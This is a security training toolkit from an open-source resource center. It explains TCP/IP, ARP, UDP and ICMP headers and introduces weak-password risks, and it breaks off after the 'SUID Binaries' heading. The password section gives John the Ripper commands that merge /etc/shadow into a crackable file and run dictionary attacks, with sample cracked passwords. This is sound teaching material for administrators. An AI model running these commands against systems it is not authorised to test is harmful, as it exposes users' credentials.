Open Source Security Tools Training Tool Kit

7/30/2019 Open Source Security Tools Training Tool Kit


Open Source Security Tools


Introduction

The Open Source Resource Center (OSRC) is a project of the Pakistan Software Export Board (PSEB),

Ministry of Information Technology. It aims to promote and support open source initiatives in the

country through awareness-raising seminars, training workshops and network migrations.

Most security breaches occur because of a lack of awareness of security policies and management. Most of these breaches can be prevented if systems and networks are configured with some basic security mechanisms.

This training toolkit aims to develop an awareness of basic security concepts, with a focus on using open source security tools.

The training program targets network and system administrators, system and network support staff, officers of organizations in sectors such as banking, telecom, BPO and IT, and students with basic knowledge of system administration.


Acknowledgements and Feedback

My thanks to OSRC's Mr. Shah Mansoor for developing this course.

This course has been edited by OSRC's Content Writer, Ms. Seema Javed Amin.

The OSRC looks forward to your feedback on both the course and the training program, and to improving them in the future.

Thank you.

Khurram Islam Khan

Project Manager (Open Source Resource Center)


Contents

1. TCP/IP in Depth
   Internet Protocol
   TCP
   UDP
   ICMP

2. Security Concepts
   Exploits and Vulnerabilities
   Weak Passwords
   SUID Binaries
   Buffer Overflows
   Race Conditions
   Viruses and Worms
   Keylogging
   Trojans and Backdoors
   Rootkits
   Attacks Against Network
   TCP/IP Attacks

3. Open Source Firewalls
   Iptables
   Smoothwall
   Ipcop

4. Open Source VPNs
   IPsec Based VPNs
   IPsec: An Overview
   IPsec Implementation on Linux

5. Open Source Scanners and Sniffers
   Port Scanners
   Nmap
   Vulnerability Scanners
   Nessus
   Network Sniffers
   Wireshark

6. Open Source IDS
   Snort


TCP/IP In Depth

Internet Protocol (IP)

The Internet Protocol (IP) is part of the TCP/IP suite, which follows a four-layer model (Figure 1.1). IP is designed to interconnect networks to form an internet over which data can be passed back and forth. It contains addressing and control information that enables packets to be routed through this internet. A packet is defined as a logical grouping of information, which includes a header containing control information and, usually, user data.

The equipment that encounters these packets, known as routers, strips off and examines the headers that contain the routing information. The headers are then modified and reformulated as a packet to be passed along.

One of IP's primary functions is to provide connectionless, unreliable, best-effort delivery of datagrams through an internetwork. Connectionless means that no connection is established before data is sent. Datagrams can be described as a logical grouping of information sent as a network layer unit over a communication medium. IP datagrams are the primary information units in the Internet. Another of IP's principal responsibilities is the fragmentation and reassembly of datagrams to support links with different maximum transmission sizes.

Application

Transmission Control Protocol

Internet Protocol

Network Address

Figure 1.1 The four-layer TCP/IP model


Bit positions: 0, 4, 8, 16, 19, 24, 31

| Version | Length | Type of Service | Total Length |
| Identification | Flags | Fragment Offset |
| Time to Live | Protocol | Header Checksum |
| Source Address |
| Destination Address |
| Options |
| Data |

Figure 1.2 An IP Packet

An IP packet contains the following fields, illustrated in Figure 1.2:

Version: The IP version currently used.

IP Header Length (Length): The datagram header length in 32-bit words.

Type-of-Service (ToS): How the upper-layer protocol (the layer immediately above, such as the transport protocols TCP and UDP) wants the current datagram to be handled, and the level of importance assigned to it.

Total Length: The length, in bytes, of the entire IP packet, including header and data.

Identification: An integer that identifies the datagram and is used to piece together its fragments.

Flags: A 3-bit field. The first bit is reserved and is not used at this time. The second bit (Don't Fragment) specifies whether the packet may be fragmented. The third bit (More Fragments) indicates whether further fragments follow; it is not set in the last fragment of a series.

Fragment Offset: The location of the fragment's data, in units of 8 bytes, relative to the start of the data in the original datagram. This allows for proper reconstruction of the original datagram.

Time-to-Live (TTL): A counter that each router decrements. When it reaches zero, the packet is dropped, which keeps packets from looping endlessly.

Protocol: Indicates the upper-layer protocol that is to receive the incoming packet (for example, 6 for TCP or 1 for ICMP).

Header Checksum: Helps ensure the integrity of the IP header.

Source Address/Destination Address: The sending and receiving nodes (station, server, and/or router).

Options: Optional fields, such as security options.

Data: Upper-layer information.

Internet Protocol, Src: 203.215.161.166 (203.215.161.166), Dst: 92.122.208.208

(92.122.208.208)

Version: 4

Header length: 20 bytes

Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)

0000 00.. = Differentiated Services Codepoint: Default (0x00)

.... ..0. = ECN-Capable Transport (ECT): 0

.... ...0 = ECN-CE: 0

Total Length: 480

Identification: 0x0967 (2407)

Flags: 0x04 (Don't Fragment)

0... = Reserved bit: Not set

.1.. = Don't fragment: Set


..0. = More fragments: Not set

Fragment offset: 0

Time to live: 64

Protocol: TCP (0x06)

Header checksum: 0x94e8 [correct]

[Good: True]

[Bad : False]

Source: 203.215.161.166 (203.215.161.166)

Destination: 92.122.208.208 (92.122.208.208)

Internet Protocol, Src: 168.143.106.100 (168.143.106.100), Dst: 203.215.161.166

(203.215.161.166)

Version: 4

Header length: 20 bytes

Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)

0000 00.. = Differentiated Services Codepoint: Default (0x00)

.... ..0. = ECN-Capable Transport (ECT): 0

.... ...0 = ECN-CE: 0

Total Length: 84

Identification: 0x8a2e (35374)

Flags: 0x00

0... = Reserved bit: Not set

.0.. = Don't fragment: Not set

..0. = More fragments: Not set

Fragment offset: 0

Time to live: 54

Protocol: ICMP (0x01)

Header checksum: 0x7a09 [correct]

[Good: True]

[Bad : False]

Source: 168.143.106.100 (168.143.106.100)

Destination: 203.215.161.166 (203.215.161.166)
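As a rough illustration of the header layout, the following Python sketch rebuilds the 20-byte header of the first capture above, computes its header checksum, and decodes the fields again. The function names (internet_checksum, parse_ipv4_header) are made up for this example, and the sketch assumes a header without options.

```python
import socket
import struct

def internet_checksum(data: bytes) -> int:
    """One's-complement sum of 16-bit words, as used for the IP header checksum."""
    if len(data) % 2:
        data += b"\x00"                      # pad odd-length input with a zero byte
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                       # fold carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def parse_ipv4_header(raw: bytes) -> dict:
    """Decode the fixed 20-byte part of an IPv4 header (options are ignored)."""
    (ver_ihl, tos, total_len, ident, flags_frag,
     ttl, proto, checksum, src, dst) = struct.unpack("!BBHHHBBH4s4s", raw[:20])
    return {
        "version": ver_ihl >> 4,
        "header_len": (ver_ihl & 0x0F) * 4,        # field counts 32-bit words
        "tos": tos,
        "total_len": total_len,
        "id": ident,
        "dont_fragment": bool(flags_frag & 0x4000),
        "more_fragments": bool(flags_frag & 0x2000),
        "frag_offset": (flags_frag & 0x1FFF) * 8,  # field counts 8-byte units
        "ttl": ttl,
        "protocol": proto,
        "checksum": checksum,
        "src": socket.inet_ntoa(src),
        "dst": socket.inet_ntoa(dst),
    }

# Field values copied from the first capture; the checksum field starts as zero.
sample = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 480, 0x0967, 0x4000, 64, 6, 0,
                     socket.inet_aton("203.215.161.166"),
                     socket.inet_aton("92.122.208.208"))
computed = internet_checksum(sample)
complete = sample[:10] + struct.pack("!H", computed) + sample[12:]
header = parse_ipv4_header(complete)
print(hex(computed), header["src"], "->", header["dst"], "TTL", header["ttl"])
```

The computed value can be compared with the "Header checksum" line of the capture. Running the same checksum function over a header that already contains a correct checksum yields 0, which is how a receiver validates the header.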

IP Datagrams, Encapsulation, Size, and Fragmentation

IP datagrams are the fundamental transfer unit of the Internet. An IP datagram is the unit of data exchanged between IP modules. IP datagrams have headers with fields that provide routing information used by infrastructure equipment such as routers (Figure 1.3):

| Data for Upper Layer |
| IP Header | IP Data |
| Data Link Header | Data Link Data | Frame Check |

Segments

Figure 1.3 An IP Datagram

The data in a packet is not really a concern for IP. Instead, IP is concerned with the control information as it pertains to the upper-layer protocol. This information is stored in the IP header, and IP uses it to try to deliver the datagram to its destination on the local network or over the Internet. Think of IP as the method and the datagram as the means.

It is important to understand how a datagram travels across networks. To travel across the Internet over physical media, each datagram must be carried in a physical frame. The process of carrying a datagram across media inside a frame is called encapsulation.

One problem with a traveling datagram is that networks enforce a Maximum Transmission Unit (MTU), a limit on the size of a single transfer. To further complicate the issue, different types of networks enforce their own MTU; for example, Ethernet has an MTU of 1500 bytes, FDDI uses an MTU of 4470 bytes, and so on. When datagrams traveling in frames cross network types with different size limits, routers must sometimes divide the datagram to accommodate a smaller MTU. This process is known as fragmentation.
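The arithmetic behind fragmentation can be sketched in a few lines of Python. This is only a simplified model: the function name fragment is invented for the example, the header is assumed to be 20 bytes with no options, and the 4000-byte datagram is a made-up input. It relies on the fact that the Fragment Offset field counts 8-byte units, so every fragment except the last carries a multiple of 8 data bytes.

```python
def fragment(total_len: int, mtu: int, header_len: int = 20):
    """Split a datagram of total_len bytes into fragments that fit the given MTU.

    Returns a list of (offset_in_8_byte_units, payload_bytes, more_fragments).
    """
    payload = total_len - header_len
    # Largest payload per fragment, rounded down to a multiple of 8 bytes.
    max_payload = (mtu - header_len) // 8 * 8
    if max_payload <= 0:
        raise ValueError("MTU too small to carry any data")
    fragments = []
    sent = 0
    while sent < payload:
        size = min(max_payload, payload - sent)
        more = sent + size < payload       # More Fragments flag
        fragments.append((sent // 8, size, more))
        sent += size
    return fragments

# Hypothetical 4000-byte datagram crossing an Ethernet link (MTU 1500).
for offset, size, more in fragment(4000, 1500):
    print(f"offset={offset:4d} payload={size:5d} MF={int(more)}")
```

Each fragment gets its own copy of the IP header, which is why the payload per fragment is smaller than the MTU itself.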

ARP/RARP Engineering: Introduction to Physical Hardware Address Mapping

We need to discover how a host station or a piece of infrastructure equipment, such as a router, matches an IP address to a physical hardware address. Every interface, or Network Interface Card (NIC), in a station, server, or piece of infrastructure equipment has a unique physical address that is programmed and bound internally by its manufacturer.

One goal of infrastructure software is to communicate using an assigned IP (Internet) address, while hiding the hardware's unique physical address. Underneath all of this is the mapping of the assigned address to the actual physical hardware address. The Address Resolution Protocol (ARP) is used to map these addresses.

An ARP request is a packet that is broadcast to all hosts attached to a physical network. It contains the IP address of the node or station with which the sender wants to communicate. Other hosts on the network ignore this packet after storing a copy of the sender's IP/hardware address mapping. The target host, however, replies with its hardware address, which is returned to the sender and stored in the sender's ARP cache. The two nodes can now communicate with each other.

ARP Encapsulation and Header Formatting

It is important to know that ARP is not an Internet protocol: ARP does not leave the local logical network, and therefore does not need to be routed.

Rather, ARP requests are broadcast to every host interface on the network, traveling from machine to machine encapsulated in the data portion of Ethernet frames.

Figure 1.4 illustrates the layout of an ARP packet, which is also used by the Reverse Address Resolution Protocol (RARP). The packet's components are defined in the list after the figure:


| Type of Hardware | Type of Protocol |
| Hardware Length | Protocol Length | Operation Field |
| ARP Sender's Hardware Address (0-3 Octets) |
| ARP Sender's Hardware Address (4-5 Octets) | ARP Sender's IP Address (0-1 Octets) |
| ARP Sender's IP Address (2-3 Octets) | RARP Target's Hardware Address (0-1 Octets) |
| RARP Target's Hardware Address (2-5 Octets) |
| RARP Target's IP Address (0-3 Octets) |

Figure 1.4 An ARP/RARP Packet

Type of Hardware: Specifies the target host's hardware interface type (1 for Ethernet).

Type of Protocol: The protocol type the sender has supplied (0800 hexadecimal for an IP address).

Hardware Length: The length of the hardware address.

Protocol Length: The length of the protocol address.

Operation Field: Specifies whether the packet is an ARP request or response, or a RARP request or response.

ARP Sender's Hardware Address: The sender's hardware address.

ARP Sender's IP Address: The sender's IP address.

RARP Target's Hardware Address: The target's hardware address.

RARP Target's IP Address: The target's IP address.

ARP packets do not have a fixed-size header. The length fields shown in Figure 1.4 state how long the hardware and protocol addresses are, which enables ARP to be implemented with other technologies.
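To make the field list above more concrete, here is a minimal Python sketch that packs and unpacks an ARP request for the common Ethernet/IPv4 case (6-byte hardware addresses, 4-byte protocol addresses). The helper names and the sample MAC and IP addresses are hypothetical; the operation codes used (1 = ARP request, 2 = ARP reply, 3 = RARP request, 4 = RARP reply) are the standard assignments.

```python
import socket
import struct

# Field order follows Figure 1.4: hardware type, protocol type, the two
# length fields, the operation, then sender and target address pairs.
ARP_FORMAT = "!HHBBH6s4s6s4s"

def build_arp_request(sender_mac: bytes, sender_ip: str, target_ip: str) -> bytes:
    return struct.pack(
        ARP_FORMAT,
        1,                        # type of hardware: Ethernet
        0x0800,                   # type of protocol: IP
        6,                        # hardware address length in bytes
        4,                        # protocol address length in bytes
        1,                        # operation: ARP request
        sender_mac,
        socket.inet_aton(sender_ip),
        b"\x00" * 6,              # target hardware address is not yet known
        socket.inet_aton(target_ip),
    )

def parse_arp(packet: bytes) -> dict:
    (htype, ptype, hlen, plen, oper,
     sha, spa, tha, tpa) = struct.unpack(ARP_FORMAT, packet[:28])
    return {
        "hardware_type": htype,
        "protocol_type": ptype,
        "hardware_len": hlen,
        "protocol_len": plen,
        "operation": oper,
        "sender_mac": ":".join("%02x" % b for b in sha),
        "sender_ip": socket.inet_ntoa(spa),
        "target_mac": ":".join("%02x" % b for b in tha),
        "target_ip": socket.inet_ntoa(tpa),
    }

# Hypothetical addresses, chosen only for illustration.
request = build_arp_request(bytes.fromhex("001122334455"), "192.168.1.10", "192.168.1.1")
fields = parse_arp(request)
print(len(request), fields["sender_mac"], "asks who has", fields["target_ip"])
```

The sketch only builds the ARP payload; on a real network it would be placed in the data portion of an Ethernet frame addressed to the broadcast address.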

Reverse Address Resolution Protocol (RARP) Transactions, Encapsulation

The Reverse Address Resolution Protocol (RARP) is, to some degree, the opposite of ARP.

Basically, RARP allows a station to broadcast its hardware address, expecting a server daemon

to respond with an available IP address for the station to use. Diskless machines use RARP to

obtain IP addresses from RARP servers.

It is important to know that RARP messages, like ARP, are encapsulated in Ethernet frames.

Likewise, RARP is broadcast from machine to machine, communicating with every host

interface on the network.

| ARP Sender's IP Address (2-3 Octets) | RARP Target's Hardware Address (0-1 Octets) |
| RARP Target's Hardware Address (2-5 Octets) |
| RARP Target's IP Address (0-3 Octets) |

Figure 1.5

RARP Service

The RARP daemon (RARPd) is a service that responds to RARP requests. Diskless systems typically use RARP at boot time to discover their 32-bit IP address, given their 48-bit Ethernet hardware address. The booting machine sends its Ethernet address, encapsulated in a frame, as a RARP request message. The server running RARPd must have the machine's name-to-IP-address entry, or that entry must be available from the Domain Name System (DNS), together with the machine's name-to-Ethernet-address entry. With these sources available, the RARPd server maps the Ethernet address to the corresponding IP address.

Note:

RARP, with ARP spoofing, gives a hacker the ability to passively request an IP address, and to

passively partake in network communications, typically unnoticed by other nodes.

Transmission Control Protocol (TCP)

IP has many weaknesses, one of which is unreliable packet delivery: packets may be dropped due to transmission errors, bad routes, or throughput degradation. The Transmission Control Protocol (TCP) helps reconcile these issues by providing reliable, stream-oriented connections. In fact, the TCP/IP suite is predominantly based on TCP functionality, which in turn is built on IP. TCP's features describe a connection-oriented process of communication establishment.

Many components contribute to TCP's reliable service delivery. The following are some of the main points:

Streams

Data is systematized and transferred as a stream of bits, organized into 8-bit octets or bytes. As

these bits are received, they are passed on in the same manner.

Buffer Flow Control

As data is passed in streams, protocol software may divide the stream to fill specific buffer sizes. TCP manages this process and ensures that buffers do not overflow. During this process, fast-sending stations may be stopped periodically so that slow-receiving stations can keep up.

Virtual Circuits

When one station requests communication with another, both stations inform their application

programs, and agree to communicate. If the link or communications between these stations fail,


both stations are made aware of the breakdown and inform their respective software

applications. In this case, a coordinated retry is attempted.

Full Duplex Connectivity

Stream transfer occurs in both directions, simultaneously, to reduce overall network traffic.

Sequencing and Windowing

TCP organizes and counts bytes in the data stream using a 32-bit sequence number. Every TCP packet contains a sequence number (the position of its first data byte in the stream) and an acknowledgment number (the next byte that the sender of the packet expects to receive). A concept known as a sliding window makes stream transmission more efficient: it uses bandwidth more effectively, because it allows multiple packets to be transmitted before an acknowledgment is required.

Figure 1.6

Figure 1.6 is a simplified example of the TCP sliding window. In this example, a sender has bytes to send in sequence (1-8) to a receiving station with a window size of 4. The sending station places the first 4 bytes in a window and sends them, then waits for an acknowledgment (ACK=5). This acknowledgment specifies that the first 4 bytes were received and that the receiver is now waiting for byte 5. Then, assuming the window size is still 4, the sending station moves the sliding window 4 bytes to the right and sends bytes 5-8. Upon receiving these bytes, the receiving station sends an acknowledgment (ACK=9), indicating that it is waiting for byte 9. And the process continues.

The receiver may indicate a window size of 0 at any point, in which case the sender will not send any more bytes until the window size is greater. A typical cause of this is that the receiver's buffer is full.
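The exchange described above can be traced with a small Python sketch. It is a deliberately simplified model, assuming an error-free transfer and a window size that never changes; the function name sliding_window is made up for this example.

```python
def sliding_window(first: int, last: int, window: int):
    """Return (first_byte_sent, last_byte_sent, ack) for each window of a transfer.

    Assumes no loss and a constant window size, as in the example in the text.
    """
    if window <= 0:
        raise ValueError("a window of 0 means the sender must wait")
    steps = []
    next_byte = first
    while next_byte <= last:
        end = min(next_byte + window - 1, last)   # last byte that fits in the window
        ack = end + 1                             # receiver asks for the next byte
        steps.append((next_byte, end, ack))
        next_byte = ack                           # slide the window to the right
    return steps

for start, end, ack in sliding_window(1, 8, 4):
    print(f"send bytes {start}-{end}, receive ACK={ack}")
```

With the values from the text (bytes 1-8, window size 4) the trace consists of two rounds, acknowledged with ACK=5 and ACK=9.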

TCP Packet Format and Header Snapshots

Keeping in mind that it is important to differentiate between captured packets (whether they are TCP, UDP, ARP, and so on), look at the TCP packet format in Figure 1.7, whose components are defined in the following list:

| Source Port | Destination Port |
| Sequence Number |
| Acknowledgment Number |
| Data Offset | Reserved | Flags | Window Size |
| Checksum | Urgent Pointer |
| Options |
| Data |

Figure 1.7


Source Port: Specifies the port at which the source process sends and receives TCP data.

Destination Port: Specifies the port at which the destination process sends and receives TCP data.

Sequence Number: A 32-bit number identifying the position of the segment's first data byte within the entire byte stream of the TCP connection. After reaching 2^32 - 1, this number wraps around to 0.

Acknowledgment Number: If the ACK bit is set, this field contains the value of the next sequence number that the segment's sender expects to receive.

Data Offset: A 4-bit field that specifies the total TCP header length in 32-bit words. Without options, a TCP header is always 20 bytes in length. The largest a TCP header may be is 60 bytes. This field is required because the size of the options field(s) cannot be predetermined.

Reserved: Held for future use.

Flags: Control information, such as the SYN, ACK, and FIN bits, used for connection establishment and termination.

Window Size: Tells the sender how much data the receiver is willing to accept.

Checksum: Allows the receiver to detect damage to the header or data that occurred during transmission.

Urgent Pointer: In certain circumstances, it may be necessary for a TCP sender to notify the receiver about urgent data that should be processed by the receiving application as soon as possible. This 16-bit field tells the receiver where the last byte of urgent data in the segment ends.

Options: A TCP sender and receiver may use several optional parameters in order to provide additional functionality. The length of this field varies, depending on the option(s) used, but it cannot be larger than 40 bytes, because the 4-bit header length field limits the whole header to 60 bytes. The most common option is the Maximum Segment Size (MSS). A TCP receiver tells the TCP sender the MSS it is willing to accept through the use of this option. Other options are often used for various flow control and congestion control techniques.

Data: Upper-layer information.
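As an illustrative sketch of the fields listed above, the Python snippet below decodes the fixed 20-byte part of a TCP header and uses the Data Offset field to separate options from data. The function name parse_tcp_header and the sample segment (ports, sequence number, window size) are invented for this example, and the checksum is simply left at 0 rather than computed.

```python
import struct

# Flag bits in the low six bits of the flags field, from bit 0 upward.
FLAG_NAMES = ["FIN", "SYN", "RST", "PSH", "ACK", "URG"]

def parse_tcp_header(segment: bytes) -> dict:
    (src_port, dst_port, seq, ack,
     offset_flags, window, checksum, urgent) = struct.unpack("!HHIIHHHH", segment[:20])
    header_len = (offset_flags >> 12) * 4       # Data Offset counts 32-bit words
    flags = [name for bit, name in enumerate(FLAG_NAMES) if offset_flags & (1 << bit)]
    return {
        "src_port": src_port,
        "dst_port": dst_port,
        "seq": seq,
        "ack": ack,
        "header_len": header_len,
        "flags": flags,
        "window": window,
        "checksum": checksum,
        "urgent": urgent,
        "options": segment[20:header_len],      # empty when header_len is 20
        "data": segment[header_len:],
    }

# Hypothetical SYN segment: data offset 6 (24-byte header), SYN flag set,
# followed by one MSS option (kind 2, length 4, value 1460). Checksum not computed.
syn = (struct.pack("!HHIIHHHH", 49152, 80, 1000, 0, (6 << 12) | 0x02, 65535, 0, 0)
       + struct.pack("!BBH", 2, 4, 1460))
info = parse_tcp_header(syn)
kind, length, mss = struct.unpack("!BBH", info["options"])
print(info["flags"], "header", info["header_len"], "bytes, MSS", mss)
```

Because the Data Offset is read before the options are sliced, the same function handles headers with and without options.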

User Datagram Protocol (UDP)

The User Datagram Protocol (UDP) operates in a connectionless fashion; it provides the same unreliable datagram delivery service as IP. Unlike TCP, UDP does not use SYN and ACK bits to establish connections or to assure delivery and reliability of transmissions. Moreover, UDP does not include flow control or error recovery functionality. Consequently, UDP messages can be lost, duplicated, or arrive in the wrong order. Because UDP headers are smaller, UDP consumes less network bandwidth than TCP; and because there is no flow control, messages can arrive faster than the receiving station can process them.

UDP is typically utilized where higher-layer protocols provide the necessary error recovery and flow control. Popular server daemons that employ UDP include Network File System (NFS), Simple Network Management Protocol (SNMP), Trivial File Transfer Protocol (TFTP), and Domain Name System (DNS).

UDP Formatting, Encapsulation, and Header Snapshots

UDP messages are known as user datagrams. These datagrams, including the UDP header and data, are encapsulated in IP as they travel across the Internet. Basically, UDP adds a header to the data that a user sends, and passes it along to IP. The IP layer then adds a header to what it receives from UDP. Finally, the network interface layer inserts the datagram in a frame before sending it from one machine to another.

As previously mentioned, UDP messages contain smaller headers and incur less overhead than TCP.

The UDP datagram format is shown in Figure 1.8, and its components are defined in the list

that follows:


| Source Port | Destination Port |
| Message Length | Checksum |
| Data |

Figure 1.8

Source/Destination Port: A 16-bit UDP port number used for datagram processing.

Message Length: Specifies the number of octets in the UDP datagram, including the header.

Checksum: An optional field used to verify the integrity of the datagram.

Data: The data handed down to the UDP protocol, including upper-layer headers.
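The four header fields above fit in 8 bytes, which the following Python sketch packs and unpacks. The function names, port numbers and payload are hypothetical. The checksum is left at 0, which over IPv4 means that no checksum was computed; a real implementation would normally calculate it.

```python
import struct

UDP_HEADER = "!HHHH"   # source port, destination port, message length, checksum

def build_udp_datagram(src_port: int, dst_port: int, data: bytes) -> bytes:
    length = 8 + len(data)                  # header (8 bytes) plus data
    # Checksum 0: not computed in this sketch.
    return struct.pack(UDP_HEADER, src_port, dst_port, length, 0) + data

def parse_udp_datagram(datagram: bytes) -> dict:
    src_port, dst_port, length, checksum = struct.unpack(UDP_HEADER, datagram[:8])
    return {
        "src_port": src_port,
        "dst_port": dst_port,
        "length": length,
        "checksum": checksum,
        "data": datagram[8:length],
    }

# Hypothetical datagram from an ephemeral port to port 53.
datagram = build_udp_datagram(40000, 53, b"example query")
parsed = parse_udp_datagram(datagram)
print(parsed["length"], parsed["data"])
```

Compared with the 20-byte minimum TCP header, the fixed 8-byte header is where UDP's lower overhead comes from.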

Internet Control Message Protocol (ICMP)

The Internet Control Message Protocol (ICMP) delivers message packets, and reports errors and other pertinent information to the sending station or source. Hosts and infrastructure equipment use this mechanism to communicate control and error information as it pertains to IP packet processing.

ICMP Format, Encapsulation, and Delivery

ICMP message encapsulation is a two-fold process. The messages are encapsulated in IP datagrams, which are in turn encapsulated in frames, as they travel across the Internet. Basically, ICMP uses the same unreliable means of communication as any other datagram. This means that ICMP error messages may themselves be lost or duplicated.

The ICMP format includes a message type field, indicating the type of message; a code field that gives more detailed information about the type; and a checksum field, which provides the same functionality as IP's checksum.

When an ICMP message reports an error, it includes the header and data of the datagram that caused the specified problem. This helps the receiving station understand which application and protocol sent the datagram.

| Message Type | Code | Checksum |

Figure 1.9

Message Types:

Message Type    Description

0               Echo Reply
3               Destination Unreachable
4               Source Quench
5               Route Redirect
8               Echo Request
11              Datagram Time Exceeded
12              Datagram Parameter Problem
13              Timestamp Request
14              Timestamp Reply
15              Information Request
16              Information Reply
17              Address Mask Request
18              Address Mask Reply

Figure 1.10 ICMP Message Chart

There are many types of useful ICMP messages. Figure 1.10 lists several of them, which are described below:


Echo Reply (Type 0)/Echo Request (Type 8): The basic mechanism for testing possible communication between two nodes. The receiving station, if available, is asked to reply to the ping.

Destination Unreachable (Type 3): This message type is issued in several situations, including when a router or gateway does not know how to reach the destination, when a protocol or application is not active, when a datagram specifies an unstable route, or when a router must fragment a datagram and cannot because the Don't Fragment flag is set.

Source Quench (Type 4): A basic form of flow control for datagram delivery. When datagrams arrive at a receiving station too quickly to be processed, the datagrams are discarded. During this process, for every datagram that has been dropped, an ICMP Type 4 message is passed along to the sending station. The Source Quench messages are, in effect, requests to slow down the rate at which datagrams are sent.

Route Redirect (Type 5): Routing information is exchanged periodically to accommodate network changes and to keep routing tables up to date. When a router identifies a host that is using a non-optimal route, the router sends an ICMP Type 5 message to that host while forwarding the datagram to the destination network. As a result, routers can send Type 5 messages only to hosts directly connected to their networks.

Datagram Time Exceeded (Type 11): A gateway or router will emit a Type 11 message if it is forced to drop a datagram because the TTL (Time-to-Live) field has reached 0.

Datagram Parameter Problem (Type 12): Specifies a problem with the datagram header that is impeding further processing. The datagram will be discarded, and a Type 12 message will be transmitted.

Timestamp Request (Type 13)/Timestamp Reply (Type 14): These provide a means for delay tabulation of the network. The sending station injects a send timestamp (the time the message was sent) and the receiving station appends a receive timestamp, so that the stations can compute an estimated delay time and assist their internal clock synchronization.

Information Request (Type 15)/Information Reply (Type 16): As an alternative to RARP (described previously), stations use Type 15 and Type 16 to obtain an Internet address for a network to which they are attached. The sending station emits the message with the network portion of the Internet address, and waits for a response with the host portion (its IP address) filled in.

Address Mask Request (Type 17)/Address Mask Reply (Type 18): Similar to an Information Request/Reply, stations can send Type 17 and Type 18 messages to obtain the subnet mask of the network to which they are attached. Stations may submit this request to a known node, such as a gateway or router, or broadcast the request to the network.
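As a hedged illustration of the type, code and checksum fields, the Python sketch below builds an Echo Request (Type 8) and labels it using the types from Figure 1.10. The identifier and sequence number that follow the checksum are specific to echo messages and are not described in the text above; the function names and sample values are made up for this example.

```python
import struct

ICMP_TYPES = {
    0: "Echo Reply", 3: "Destination Unreachable", 4: "Source Quench",
    5: "Route Redirect", 8: "Echo Request", 11: "Datagram Time Exceeded",
    12: "Datagram Parameter Problem", 13: "Timestamp Request",
    14: "Timestamp Reply", 15: "Information Request", 16: "Information Reply",
    17: "Address Mask Request", 18: "Address Mask Reply",
}

def internet_checksum(data: bytes) -> int:
    """One's-complement sum of 16-bit words (same algorithm as the IP checksum)."""
    if len(data) % 2:
        data += b"\x00"                      # pad odd-length input with a zero byte
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                       # fold carries into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def build_echo_request(identifier: int, sequence: int, payload: bytes = b"") -> bytes:
    # First pass with a zero checksum, then insert the computed value.
    header = struct.pack("!BBHHH", 8, 0, 0, identifier, sequence)
    checksum = internet_checksum(header + payload)
    return struct.pack("!BBHHH", 8, 0, checksum, identifier, sequence) + payload

def describe(message: bytes) -> str:
    msg_type, code, _checksum = struct.unpack("!BBH", message[:4])
    name = ICMP_TYPES.get(msg_type, "Unknown")
    return f"{name} (type {msg_type}, code {code})"

# Hypothetical identifier, sequence number and payload.
packet = build_echo_request(identifier=0x1234, sequence=1, payload=b"ping")
print(describe(packet), "valid" if internet_checksum(packet) == 0 else "corrupt")
```

Sending such a message on a real network requires a raw socket and administrative privileges, which is outside the scope of this sketch.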


Security Concepts

Exploits and Vulnerabilities

The following are some of the common ways in which an initial compromise can occur,

including weak passwords, SUID binaries, and buffer overflows.

Weak Passwords

The simplest, and still one of the most commonly exploited, vulnerabilities in Linux is the use of weak or non-existent passwords. An administrator may be well-versed in the art of choosing complicated passwords, but what about users? Many users choose simple passwords, which threaten the security of the whole system.

Most applications store user passwords using some form of encryption or hashing, but it is still essential to limit access to the stored passwords as much as possible because of the risk of password cracking. Hash methods such as MD5 are one-way: no mathematical formula can be applied to convert a hashed password back to its original plain text. Instead, programs such as login hash the password entered by the user, and compare this with the user's hashed password in /etc/shadow. If the two hashed passwords are identical, the two plain text passwords must also be identical, and the user is logged into the system. Unless there is a weakness in the method that allows an algorithm to be used to crack a password (and occasionally such weaknesses are found), the only way to discover the plain text version of a hash is to hash every possible sequence of characters until a match is found.

Ninety-eight different characters can be used to form passwords for accounts on Linux systems; with a four-character password, for example, there are more than 90 million possible combinations (98^4). This might seem like a lot, but on a modest 1 GHz machine, a four-character password hashed with MD5 can be cracked in under an hour. A five-character password can take up to three days, and a six-character password can take up to a little under one year. These are worst-case scenarios for an attacker. Many people use only lowercase letters for their passwords, and if a cracker limits his permutations to lowercase letters, a six-character password can be cracked within a day. These rough calculations also fail to account for the fact that a cracker may have dozens of machines at his disposal; with a combined processing power of 10 GHz, these figures can be reduced by a factor of 10.
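The estimates above are simple keyspace arithmetic, which the following Python sketch reproduces. The guess rate of 35,000 hashes per second is an assumption chosen only because it is roughly consistent with the figures in the text; it is not a measured value, and the function names are invented for this example.

```python
def keyspace(alphabet_size: int, length: int) -> int:
    """Number of possible passwords of exactly the given length."""
    return alphabet_size ** length

def worst_case_seconds(alphabet_size: int, length: int, guesses_per_second: float) -> float:
    """Time needed to try every candidate at a constant guess rate."""
    return keyspace(alphabet_size, length) / guesses_per_second

ASSUMED_RATE = 35_000   # hypothetical hashes per second on one machine

for label, alphabet, length in [
    ("4 characters, full set", 98, 4),
    ("5 characters, full set", 98, 5),
    ("6 characters, full set", 98, 6),
    ("6 characters, lowercase only", 26, 6),
]:
    seconds = worst_case_seconds(alphabet, length, ASSUMED_RATE)
    print(f"{label:30s} {keyspace(alphabet, length):>16,d} candidates, "
          f"about {seconds / 86400:.2f} days")
```

Each additional character multiplies the search time by the size of the alphabet, which is why both password length and character variety matter.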


John the Ripper

John the Ripper is a fast and highly flexible UNIX password cracker. It is available for UNIX,

DOS, and Windows.

After installing, enter the run directory, and (as root) use the unshadow binary to generate an

unshadowed version of /etc/passwd:

# ./unshadow /etc/passwd /etc/shadow > passwd.1

Start with the simplest cracking method, and move on to the more advanced features only if the standard method does not produce any results.

$ ./john passwd.1

Loaded 7 passwords with 3 different salts (FreeBSD MD5 [32/32])

letmein (apollo)

testtest (zeus)

guesses: 2 time: 0:00:00:04 4% (1) c/s: 1028 trying: Crystal1

Session aborted

For more resistant passwords, use the -w option to perform dictionary-based cracking:

$ ./john -w:/usr/share/dict/words passwd.1

SUID Binaries

